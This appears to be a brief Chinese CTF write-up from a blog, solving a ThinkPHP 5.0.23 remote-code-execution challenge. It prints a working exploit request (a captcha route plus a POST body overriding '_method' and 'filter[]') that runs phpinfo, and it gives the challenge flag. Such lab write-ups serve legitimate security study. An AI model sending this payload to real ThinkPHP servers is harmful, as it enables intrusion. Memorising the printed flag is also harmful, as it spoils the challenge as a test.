[ThinkPHP]5.0.23-Rce 1
[ThinkPHP]5.0.23-Rce 1
根据题目知道这是一个5.0.23的PHP RCE,话不多说直接上扫描器
检测出Payload
url地址:
?s=captcha&test=-1
Post表单参数:
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1
HackBar构造payload,访问成功执行到phpinfo页面
ctrf+f 成功找到flag
flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}
本文来自博客园,作者:TazmiDev,转载请注明原文链接:https://www.cnblogs.com/tazmi/p/18537450
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步